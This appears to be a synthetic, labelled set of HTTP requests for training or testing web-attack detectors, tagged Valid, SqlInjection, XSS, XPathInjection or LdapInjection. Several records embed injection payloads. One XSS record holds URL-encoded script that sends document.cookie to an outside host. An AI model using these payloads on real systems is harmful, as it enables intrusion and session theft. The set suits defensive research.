If-Unmodified-Since: Mon, 28 Jul 08 21:12:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest username="lfoxlnn"
Authorization: Basic aW9zdHlzOjNJSWlpeVI=
Range: 76648-0900
Referer: http://oL5ize.com/ehhwalpe/eby75e/voaha/xs3itr.css
TE: gzip;q=0.0
Trailer: Accept-Charset
User-Agent: etuenr/5.4.0.3.3
UA-CPU: MIPS
UA-Disp: 952,004,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 916x0533
Via: 0.3 126.231.245.84:18, 3.8 20.34.213.23
Transfer-Encoding: deflate
Upgrade: ehb/5.0, ddtr/2.0, tCi/5.5, Scstne/5.2, totwta/1.3
Warning: 307 www.ohlce.jpeg "ettlhaYdor6phe" "Wed, 12 Dec 07 12:56:35 UTC"
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16825
Start - Id: 14911
class: Valid
GET /uMX0scriptQl9Kadmin8/autoexecuV9/pNNP0M2Mo/seostapbtiw/cqhkpgrfvcWth3/c3NZPQwF@kkv.jpeg?olg6ebSetppebpt=+64lgue3sf&cmdpsIT=oTddtxrt5sai3skxfC HTTP/1.0
Host: www.csEEn.net
Connection: ehNci
Accept: text/*, application/*
Accept-Charset: iso-8859-6;q=0.6, ks_c_5601-1987, x-mac-chinesesimp;q=0.5, cp-932, windows-1257;q=0.7
Accept-Encoding: gzip, compress;q=0.3, deflate;q=0.8, compress;q=0.9, gzip
Accept-Language: *
Cache-Control: ucrimnrp='e'
Client-ip: 72.62.132.226
Cookie: deeAietl=ieteN;myet=raT;Omrtadleapelg=ws9T;seaiy=al;nn=)s(E
Cookie2: $Version="750"
Date: Thu, 20 Jan 05 24:54:54 UTC
ETag: "RFGfswz-cZFmM3r"
Expect: irjtg=mioo
From: rci1ha@regno3ir.ch
If-Modified-Since: Mon, 03 Oct 05 11:36:54 UTC
If-Unmodified-Since: Thu, 05 Jul 07 01:48:00 CET
If-Match: "VL2@nRpvGk1Gi9q"
If-None-Match: *
If-Range: Thu, 07 Oct 04 23:18:33 GMT
Max-Forwards: 669
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: -14906,6-959
Referer: /sNOo.mp3
TE: gzip
Trailer: From
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 3.2; tt-is; rv:0.9.2) Gecko/15264871
UA-CPU: StrongARM
UA-Disp: 8593,9918,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 6.2 143.179.62.105:3, 8.6 www.wem1eaqD.tiff, 5.4 www.EeyihiiT.css
Transfer-Encoding: deflate
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 526 206.248.199.251:46267 "syus5sspftan" "Sun, 05 Sep 04 12:39:37 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14911
Start - Id: 50102
class: XPathInjection
PUT /l@-yMWm/Hz-varoidtmpq6/rSN-ss_jfRJBFF4q4/aU4mailn3TxAlI/2CYnL./hYEfEuOXSRWnQWW..png? HTTP/1.0
Content-Length: 254
Content-Language: oe
Content-Encoding: gzip
Content-Location: /nn8r/r7rn/blodet.dll
Content-MD5: cmNtUmFlOG10aWppYWVhdg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Jun 04 11:58:15 GMT
Last-Modified: Sun, 22 Apr 07 07:36:11 UTC
Host: www.teteL.biz:0
Connection: t1qtrr
Accept: audio/*, application/*, video/*
Accept-Charset: iso-2022-jp;q=0.0, x-mac-chinesetrad;q=0.0, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6886
Client-ip: 154.185.255.237
Cookie: i3ucaudou=rEulEcQralmrhs9o;eafiaa6mdx=ecmt']  |  P     |     //user[  name/text( ) = 'eia;cauqcEeROeee=leoprwinntSneyrrd;USe8en=form+;Iobtunnlaie6sme=515
Cookie2: $Version="14"
Date: Thu, 03 Jul 08 05:27:06 GMT
ETag: "PlgwVVj7oo0ezHxa-"
Expect: 100-continue
From: haTsx@Tdios0mS.be
If-Modified-Since: Tue, 11 Dec 07 06:25:36 UTC
If-Unmodified-Since: Thu, 22 Jan 04 06:46:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Basic NW10c2NSQjpmbGh1Mg==
Authorization: Digest nc=11aFA03d
Range: 39-707535,719-
Referer: http://www.onee.it/Sijpcdth/Ownshn/or6glh.htm
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: dtyeinteaEalwDvr
UA-CPU: x86
UA-Disp: 7455,9051,16
UA-Color: color8
UA-Pixels: 465x962
Via: 1.1 76.167.36.157, 9.0 www.icnn.htm:9342, 4.9 186.70.180.246:134
Transfer-Encoding: gzip
X-Forwarded-For: 64.186.118.225
X-Serial-Number: 8805837384319
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

E6gt=2299489&CW07@BITFDJ=rl&bmpfKaiinrhtejn=f|htctaj&Qeoljeoetazs=tEe9rhetngrli&islimyt9=0&shcedqtOevraZp=lleardwlaakD&iho=kbvpewAAWvC&v0Bf=[&iwan9soto7eio=eQ5gIcufv&N3APH9o.=5533&om1cphmaabd=4376626&xhVopeng-_=2376&pOitt=nullh&gt3ohlrlo=a8sqsVrkfIL4

End - Id: 50102
Start - Id: 42688
class: SqlInjection
POST /kcF4hn9bj/qaacrpnrdnd0aA/eHsI4HysUsI_2rqfpBE/AvjUdocument2ChttpJV6usrNZ/yPf0fcDwA2Mq.msf? HTTP/1.1
Content-Length: 135
Content-Language: n,h,oolsigea
Content-Encoding: deflate
Content-Location: http://www.ab9sena.org/plIme/iG66eao/cltbA3l/ICufoa/etoT3.txt
Content-MD5: dGF4am5lYmk2SW50YXRicw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 04:21:51 CET
Last-Modified: Tue, 06 Nov 07 03:40:48 GMT
Host: www.eraai5.ch
Connection: hEarCuE
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.1, gzip;q=0.9, compress;q=0.2
Accept-Language: ' AND     USER_NAME()='omtedr
Cache-Control: no-transform
Client-ip: 88.209.41.196
Date: Sun, 22 Mar 09 01:17:30 GMT
Expect: 2rerajnn=llDcy0Nh
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Mon, 29 May 06 16:01:08 CET
If-Unmodified-Since: Wed, 17 Aug 05 02:44:50 GMT
If-None-Match: *
If-Range: Wed, 21 Nov 07 10:03:55 UTC
Max-Forwards: 0773
Pragma: no-cache
Proxy-Authorization: NTLM NGFyNHRxbjRlc3RlNGFvcjRlOW9ybGxodHdlZ2lkOGhnaGk=
Authorization: ipdce krnNRhai=gmEa6
Referer: http://nmduc.gov/ArtEteqe/aRccune6/DdalstB/ae4i7.mspx
TE: gzip;q=0.4,deflate,trailers
User-Agent: Mozilla/2.0 (compatible; MSIE 6.0; WinNT; marateds; zesi)
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: deflate
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 766 www.raittgp6.gif "naie" 

sNcerclejcnphr=g o&tmidryv=Pefdrwhtlrtpg&o8neait2=n]eupor&Jgz1a=totuusrhereener &e0bgroaHnslee=386&sLylatAkfE=oNnCnCwphhaK&Fd0okNr=13

End - Id: 42688
Start - Id: 29450
class: Valid
GET /logrcp545LCI%uN/n0dP5DJ4tWtXlcIAnJ/IWXX3MT/q9.6Z/owFidBN_@BxvAr4.mspx?mi=e+Rzdud4Wmma%2F&odhn7=ido&iS=+C&nncHahnni=86780&hoe=form5&.AyNWAU=0lcoattftpgei HTTP/1.1
Host: www.gd7rrSdu.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: u-twbs;q=0.8
Cache-Control: min-fresh=91691
Client-ip: 72.151.165.169
Cookie: ienpcrf5TsiohuU=etfdrcp;tn=tya0ht0;fUhvg=betweenwe;iadtiee=oWXZ;Ia=e9N;UeHnnfcocdttie=tcL9LmcK8jfa
Cookie2: $Version="9"
Date: Sat, 27 Oct 07 02:16:13 UTC
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: moneAdh@fg3imxt.net
If-Modified-Since: Fri, 12 Oct 07 06:25:53 GMT
If-Unmodified-Since: Fri, 08 Feb 08 08:51:46 CET
If-Match: "pxx-FaY1FExtLIb"
If-None-Match: *
If-Range: "W4xFKoHEZQPvIZbIE"
Max-Forwards: 4228
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: Digest nc=445BEEbc
Range: -607,2-,5238-
Referer: /tisoo/e5wdy/eArrTcth/ii8bs.aspx
TE: trailers
Trailer: From
User-Agent: doamu9emi0grdl
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6889x7208
Via: FTP/1.0 246.96.191.135:82, 7.0 www.lnec.gif
Transfer-Encoding: identity
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29450
Start - Id: 29339
class: Valid
GET /ttnliqttnNarhY1wt2d/odI44i0W5@kJ1hC2/oCxfgxg6VoT_/hAarcsnle6sneo/Bieaelmvi/rMUliOUzr/nwgaeHDorx4sodui5bam.aspx?JhttpsWsock_streamONcrF0=aX5arYX.W4q&sbfr=ijW_p&rfism=fiouKVAeBy&c0lB.kj=n64e95_zeHw&remdtY=60&a9e5s=gntxsd3teatthsro5&82bawthea=414&yno=67627&iir5osodcoowj=64&4bu=hi&snlelzEBno=tDO33SruiY&wlnfney=adneeh HTTP/1.1
Host: www.sdaUAofew5.de
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-chinesetrad;q=0.2, x-mac-korean;q=0.2, x-mac-korean, big5
Accept-Encoding: *;q=0.6
Accept-Language: t-snuaa, ys-crda;q=0.2, ae3-rdAmLa;q=0.5, pIowS-o;q=0.6, etets-ee5e;q=0.4
Cache-Control: max-stale=51690
Client-ip: 152.42.80.93
Cookie: DVUPtL@.=9bYzuHv;zzBopenb9YL7lO=nodt
Cookie2: $Version="35"
Date: Wed, 14 Apr 10 18:35:30 UTC
ETag: "I6WpN5E52@3MbOmWC"
Expect: eMsa0n=j2te
From: huEdao@sesefui5t.biz
If-Modified-Since: Tue, 21 Dec 04 15:51:37 CET
If-Unmodified-Since: Tue, 10 Apr 07 14:26:36 UTC
If-Match: "8bAs7@pemgnqiCw"
If-None-Match: *
If-Range: "QtJxBpDVATn3n21"
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM OXFudW1EaTl5WXN0Ym9vZG1tYXV4WDdkdGFleHlkM3Nlc2NvNW11aA==
Authorization: Basic aGxvQWlpOmFhVE91Zm5v
Range: 415-76250
Referer: http://www.nhNdsr.biz/tsrie5le/sl7rnt/lsl6TE/T1en/6S2Nqa.wmn
TE: gzip,deflate,deflate;q=0.0
Trailer: Host
User-Agent: t6rY7.vsQu http://www.nair.st
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: HTTP/0.7 www.dttjmnsr.js, 0.7 www.m1nt.jpg:0780
Transfer-Encoding: e5sh
Upgrade: erNrnt/0.5, c2isms/4.7, 5eu4/2.1, W0yEk4/0.3
Warning: 707 229.233.88.113 "toegchfersr2gftmiE" "Sat, 27 Jan 07 13:21:51 CET"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 892680378227754
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29339
Start - Id: 22776
class: Valid
GET /zyetnkseho27e/nU/sdYPxqzVHNmRbz4Jf9Ut/iDt5bRnAE8bHALZdOlI/y8uXOjik-yaN82c@2Uf/nyweNne2iaRxmMds2ei/ntfndnceenWbToii/Ne-6/ah9marteio8Dmeeozrs.png?Ue50ea=96931607&processing-instructiontw8JP3vbscript@2K=639&xen=85017&litvsot=inu HTTP/1.0
Host: www.3aebiIgid.it
Connection: close
Accept: application/rtf;q=0.8, image/*
Accept-Charset: iso-8859-15;q=0.2, iso-8859-2, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.76.241.226
Cookie: awzffjwN5nog82x=epstmp;wz=aC7;exaortH=een;Et6=i3W3JklKI-ek;at34rm9=he 3tregh28leit;aaetmbqiz=Ai<
Cookie2: $Version="37"
Date: Fri, 17 Feb 06 15:01:28 UTC
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Sat, 09 Feb 08 13:23:20 GMT
If-Unmodified-Since: Mon, 11 Feb 08 12:08:16 CET
If-Match: "eU10d3CnSWX63hZSreY_"
If-None-Match: *
If-Range: "ST.k._IRuQBZ0tF"
Max-Forwards: 4325
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest qop=grcer75h
Authorization: Digest nonce
Range: 34-,77353-25473,-559
Referer: /iw40ls/awoirye/yn5ag6ma/tat4.wav
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/5.0 (X11; U; Solaris 2.6; ih-er; rv:7.5.4) Gecko/03816726
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 396x8159
Via: 0.9 www.exoT.css
Transfer-Encoding: compress
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 293 www.trmrle.htm "kaAne" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 22776
Start - Id: 47848
class: XSS
GET /tBsAvuikei8oiogDos/tiya0t7hce/de/lf5iyJcEFodVstylemQ/1CTKa/8.AM_YiGBBo/bpF2fk/rld806B9woH3kIAkW/SaemSa/eEpsaoiu1l2.sh?ne=Lan&sd=167721058&ixC28RqYJh=3978608&rsl722n=%3Cstyle++%3E%3C%21--%3C%2Fstyle++%3E%3Cscript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ndti.com%2Fcgi-bin%2Fet.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&Ov.V0t@F=263515&artee2rngqj=u8n0y&G35rdreclkw0rn=366285&mhnnnopctra=%28%24eac HTTP/1.1
Host: www.sis0cst6i.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.2, iso-8859-2;q=0.6
Accept-Encoding: gzip, compress
Accept-Language: aeuh-gNsTEe6u, nNd8tor-mtggd;q=0.3, ebyefI17-lze, pegNLat9-m
Cache-Control: max-stale
Client-ip: 255.37.190.65
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Sat, 08 May 04 05:42:13 UTC
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: uetaedh
From: rntaoh@dim7.fr
If-Modified-Since: Fri, 15 Aug 08 11:35:41 CET
If-Unmodified-Since: Sat, 23 Apr 05 21:38:40 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Mar 08 18:12:35 GMT
Max-Forwards: 159
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: NTLM N1NzaThseWhzYnB0c3NnU21mZXpsMk9lcGR6dGVpZGdiajJMQWVvbnRlZXo=
Range: 87782-,-880675
Referer: http://www.faaif4.uk/TtTttI/uwgoawa.js
TE: deflate;q=0.8,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 7.3; dG-yd; rv:8.5.6) Gecko/93775004
UA-CPU: x86
UA-Disp: 4309,162,32
Via: tmfsf/7.6 www.Onitn.tiff
Transfer-Encoding: compress
Upgrade: Xtfkh/8.2, Oni/6.3, dia/4.0, rase/7.9
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47848
Start - Id: 5332
class: Valid
POST /gos6nrsbets/metaTBy47Dl85Sj/varFzV/s@Jg7r/sDzeaepeil/ytiefdyhItkIissoE/il1eai/eemQwp-eGQWlocationwgWRd/gRBlike/tainiOlTwvseacs/hduGEtmgeG9id/AdF5hplwoaot5cu.png? HTTP/1.0
Content-Length: 185
Content-Language: asy,abeU,t
Content-Encoding: deflate
Content-Location: http://jp1uao.net/5ennh.js
Content-MD5: dWg2bDhtb2VncmVhemVyNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 06:51:04 UTC
Last-Modified: Sun, 26 Dec 04 18:26:12 UTC
Host: www.zptmlau.it
Connection: Aeprc
Accept: application/*, video/*, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=479
Client-ip: 132.138.162.164
Cookie: erln5tneawg=Nn@e;alosxsm2=\E;LqQxmld.Q-B@=44;0ga=6197298;Nhecrtmrls9Sinl=hoierHl8tmp0i;vCI4nfTCx=dhPw8xJa
Cookie2: $Version="847"
Date: Wed, 07 Jun 06 19:06:42 GMT
ETag: W/"TrLLp2DSFY6tfXnbJee"
Expect: 100-continue
From: rfnrLte@nf1er.st
If-Modified-Since: Sat, 10 Jun 06 11:21:07 GMT
If-Unmodified-Since: Thu, 28 Dec 06 20:12:24 CET
If-Match: "eZqAzXu1@M4xDE3"
If-None-Match: *
If-Range: "BXjIK2YOX8DrfgrZa_m"
Max-Forwards: 9870
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: gsrht ssipEath=ehuMx69
Authorization: Basic dFRlbTpiQW5laA==
Range: -2819,9615-,773-980
Referer: http://hnssnt.de/rees/nhLBihzi.pl
TE: gzip,chunked;q=0.6
Trailer: Warning
User-Agent: Mozilla/0.0 (X11; U; Linux i586 3.1; im-id; rv:0.9.2) Gecko/38398121
UA-CPU: Sparc
UA-Disp: 312,8343,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6579x971
Via: 2.4 www.pioumbn.htm, 2.3 www.riaaDn.jpeg
Transfer-Encoding: gzip
Upgrade: Oce/9.1, a2s/1.1, m5nav/1.5
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

0a7QAvzdUxkRj=6406&euiohhl2ohna=o&l7afm8b=heoer3wphptpositiony&tc7nv68n=rLoHsreypaT&skxI7lh7w=23&Cs7pnu2be=6tf&ldafnm7Ficn=36&1yHnto1oo=eE7n@o]N hetw5dker&copyHh4SZhtaccesv=09345489

End - Id: 5332
Start - Id: 37067
class: LdapInjection
GET /tGphqk@/m3gePKAvem-nI/tonbh/ez43Jy/ts35lbTLUEGt4nOFh4/Dnc/eddf1aae5eoi2hncoar/tRM/2l/iorisiosaaes/aSwaTj1jDKqYO7/nlZY9H_25.exe?olm07rn7oddats=477%29%28%26%28objectClass%3DsahE%29%28%7C%28sn%3D+eogi%29%28cn%3D4+J*%29%29&nI=n+e+f%3Atrtbsnarcp6&tlchpcSe=305876 HTTP/1.0
Host: www.eefcOinThR.org
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: iR-ghUtn, 8yit-hm, e-etdjpg;q=0.6, ot3eeE0s-T6rous, ernt-lgzhtat;q=0.0
Cache-Control: sEnHP9iU='tgsh'
Client-ip: 206.144.26.20
Cookie: leesi4i3=3
Cookie2: $Version="7"
Date: Sun, 19 Mar 06 08:51:13 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: semcn
From: umuI@4eritQe.de
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: "NtR6OBlSY3vmVyV"
If-None-Match: "iH6GTZsjCvihiJ.7"
If-Range: Fri, 22 Oct 04 10:48:47 UTC
Max-Forwards: 0
MIME-Version: 4.7
Pragma: mnseght=qrs0
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: NTLM WTZxb2V6c2ltMHNlaU9hdFQ3TXJzbnR0MGx6QWZnbGZ1a21FdA==
Range: -61152
Referer: /g6ciepyH/smsj1/nnyd2ce/Letedi/ry6ipy.mp3
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ltnsrSE
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: compress
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 84105
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37067
Start - Id: 26759
class: Valid
GET /0v/79A/K-I/wr/etugr/dUhhOC3/eT_hFVUsKCsy/sDYI-pladmin8uv20dU/KNzoptMDmGP_/d03OXViframe9RstdinXbin3b/qw3hS7IZZzsmiIZF1o0.jpg?CPCgQPr=62&tdsrui0us=730&wpDt=nph-oNreeiltjb HTTP/1.1
Host: 121.25.56.247
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.3, x-mac-chinesesimp, iso-8859-9, x-mac-korean;q=0.5
Accept-Encoding: 
Accept-Language: koi-tmhwg;q=0.0, eleaaan-lse;q=0.9, eishu-hceyte
Cache-Control: 1=0sahc
Client-ip: 200.195.26.126
Cookie: xtMPtM=137;i8poloeaRrMcen=<passthrutpimngnrtiE0a|;dysictna1d3d=9sso3kem9fgi
Cookie2: $Version="552"
Date: Fri, 03 Oct 08 23:56:03 GMT
ETag: "HYZgu-WCfRdJc6GH74w1"
Expect: 100-continue
From: ttrelh@st8tsnvenE.cz
If-Modified-Since: Sat, 06 May 06 10:18:42 GMT
If-Unmodified-Since: Thu, 19 Feb 09 22:22:46 UTC
If-Match: *
If-None-Match: *
If-Range: "-0v1gWwjQgtAVFE4BGE"
Max-Forwards: 9
MIME-Version: 1.2
Pragma: Po=3nyussy
Proxy-Authorization: Basic c2xibnN3YWk6dHJsaWNyZQ==
Authorization: NT7s lyyptc=1rw2a
Range: 65-4,-6828
Referer: /ahxen.mpg
TE: deflate,gzip
Trailer: If-None-Match
User-Agent: aIKztH4B http://www.oretdot.org
UA-CPU: 68000
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 358x270
Via: HTTP/1.0 www.anao.shtml
Transfer-Encoding: deflate
Upgrade: oudin/6.7
Warning: 221 www.efMT.js:318 "usgoyonrNydfRnhsneoc" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26759
Start - Id: 7038
class: Valid
POST /tietC9ouSc/hlotbe/odra8/s2e1CmUXj/AtmplXWupdateRei@sjh./lyNplM0wtgA/n2WYGhUK/eheAss/icT8MzXCtSZ@/lozmfDW@R/wo1n3e/t0C.css? HTTP/1.0
Content-Length: 211
Content-Language: icdfqr
Content-Encoding: identity
Content-Location: http://www.L2ijoegc.fr/ytys/iqowTi/yl1hhT8/Ereoias.txt
Content-MD5: VDVua2F0bmFzdGFmY3Nscw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Jun 09 22:22:42 GMT
Last-Modified: Sat, 29 Nov 08 12:40:45 UTC
Host: 15.35.237.236
Connection: pguar1lr
Accept: */*
Accept-Charset: macintosh, euc-jp, iso-8859-8-i;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 42.139.126.253
Cookie: pgn21bs1si=o7kNZfQKa
Cookie2: $Version="137"
Date: Wed, 17 Jan 07 17:48:44 CET
ETag: "5mD4pIqzxc3lOyc"
Expect: 100-continue
From: yfats@jmaNa.biz
If-Modified-Since: Mon, 03 Oct 05 12:34:24 GMT
If-Unmodified-Since: Thu, 15 Jul 04 12:44:28 GMT
If-Match: "bhy8OeWZjPcKb6KWgo"
If-None-Match: *
If-Range: Wed, 17 Jan 07 05:53:38 CET
Max-Forwards: 0
MIME-Version: 6.3
Pragma: sc='spnaAt0'
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: Basic dHRuYm46YUxlTmNz
Range: -251792
Referer: /sddSci/odecthh/lpeey/acsah0iu.pl
TE: chunked;q=0.5,chunked;q=0.7
Trailer: Accept-Charset
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 8.5; ej-Ae; rv:6.2.5) Gecko/04139919
UA-CPU: x86
UA-Disp: 1173,628,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: compress
Upgrade: natsnn/3.2, frn/5.3, ftOtpa/1.1
Warning: 539 www.kasz3t2.jpg "c8saEyAaoa" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ----------------
~~~~~: ~~~~~~~~~~

Errdps4=300&ilkhSiCo=ow&rnIiw1=h2openH&shtaSgygqeehuu=An(:[]uar twindow.openripo:rcp&tEhnjietqei2=50817263&nul=7167&wyo=47&lKGCA3W_CN=40644755&uaccept.0Bq=ui8lpsnto&sol8uo9eez=h68edsEr@&ewreaeralnX=2

End - Id: 7038
Start - Id: 41812
class: SqlInjection
GET /rileh7xwec3/s4x8u7WZdjbV0rEOj/ath/ohs380dWzK8rQ5/eVT/xCperlegzuC/hwhrlfiLH/wrcTtaqT/te.asmx?r8y=2jx&7jeQdo=%27++%2F**%2F++OR+++++%2F**%2F%27%27%3D+++%27 HTTP/1.0
Host: 86.5.200.108:18964
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: lt6m-Hi, ad-l;q=0.8
Cache-Control: max-stale
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="4"
Date: Sat, 14 Jan 06 10:18:05 GMT
ETag: W/"SiM_JSQ7V09Cl7B9f2"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Wed, 13 Jan 10 11:39:41 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 18 May 06 22:06:37 CET
Max-Forwards: 8005
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dx9ahetu"
Authorization: Basic Um5pZG9lOmlmZURhZg==
Range: 340098-821
Referer: /dhIIdiRi/etoo.jsp
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: stcu08SDs http://www.GE394ie.uk
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: mI9usm/2.8 23.94.88.132:8103, yoaha/8.9 82.198.197.180, 2.0 112.134.185.229:77
Transfer-Encoding: 0ntna
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41812
Start - Id: 29294
class: Valid
GET /a1/44ieahxenojoeeee4/erFhbep7teieeeam/ijJTVhmopNh5fE7fSTxm/hcRsoHp/eceoodeojsoasfe/oW4xjry@IP/sZHsfHuVUKhK3AR/te.tiff? HTTP/1.0
Host: 131.176.196.221
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: x-mac-turkish;q=0.3, us-ascii
Accept-Encoding: *
Accept-Language: hrr-webi, 7dtenou-xG;q=0.7, noE-8triidh;q=0.7, bbos-1e7eiZae, sh-on
Cache-Control: tnseAati='or8'
Client-ip: 239.57.231.184
Cookie: tav4vmushesotbo=nnkccfxml;koWIqptspaetns=323;pne8pfnGo=529351
Cookie2: $Version="9"
Date: Tue, 09 Jan 07 24:02:39 GMT
ETag: "E8uDSlAD4aIkr5RjxX"
Expect: oeBm
From: 3Mit7e@9iaef.biz
If-Modified-Since: Sat, 18 Oct 08 08:24:41 CET
